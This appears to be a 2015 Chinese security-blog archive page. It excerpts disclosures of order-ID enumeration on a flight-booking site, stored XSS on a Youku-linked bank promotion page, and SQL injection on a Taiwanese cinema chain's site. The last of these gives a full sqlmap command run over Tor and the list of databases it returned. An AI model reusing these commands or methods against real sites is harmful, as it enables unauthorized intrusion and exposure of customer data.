月度归档:2015年06月

某软件系统漏洞导致多个小网站机票预定信息泄露

多个小型订票网站机票预定信息泄露

偶然发现一个小网站机票预定信息可以遍历

http://www.htair.net/ticket/flights/order_viewedit.asp?order_id=20120724114110

而订单的id规律为年月日时分秒,即可遍历该网站所有订单。

又,发现网站的技术支持为

技术支持:易扬科技
 

继续阅读

优酷某分站存储型XSS

从其他网站输入的视频名称参数,提交到优酷后,输入输出未经过滤导致漏洞

在优酷上看某视频,不小心点了广发银行的广告,跳到了广发20周年感恩活动网站,http://cgbfriday.com/。

一不小心瞄到“上传”字眼,遂多点了几下,是上传视频,传到优酷的,那应该没有上传漏洞。

发现视频名字和感恩的话尝试插入XSS代码。(姓名一栏有过滤)。
 

继续阅读

台湾某连锁影城主站SQL注入涉及11个库

台湾某连锁影城主站SQL注入涉及11个库

 $ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --threads 2 --technique=BEUT -u "www.cinemark.com.tw/showDm.asp?id=4" --dbms=mssql --dbs   ---  Parameter: id (GET)      Type: boolean-based blind      Title: AND boolean-based blind - WHERE or HAVING clause      Payload: id=4 AND 1628=1628      Vector: AND [INFERENCE]  ---  web server operating system: Windows 8.1 or 2012 R2  web application technology: ASP.NET, Microsoft IIS 8.5, ASP  back-end DBMS: Microsoft SQL Server 2005
 available databases [11]:  [*] cinema7  [*] DA02072673  [*] DA10022673  [*] fashionMemory  [*] fubon  [*] jade  [*] lisin_music  [*] master  [*] model  [*] msdb  [*] tempdb

 

继续阅读

为什么有如此之多的网站仍然存在漏洞

为什么仍然有很多网站漏洞?这是很多用户关心的问题。

大多数企业网站的漏洞包含OpenSSL、PHP和WordPress中的漏洞,这些漏洞主要是由于这些开源软件中存在着大量自定义组合以及缺乏测试和漏洞修复。

本文中让我们看看如何从一开始以及整个开发生命周期中修复这些漏洞。

继续阅读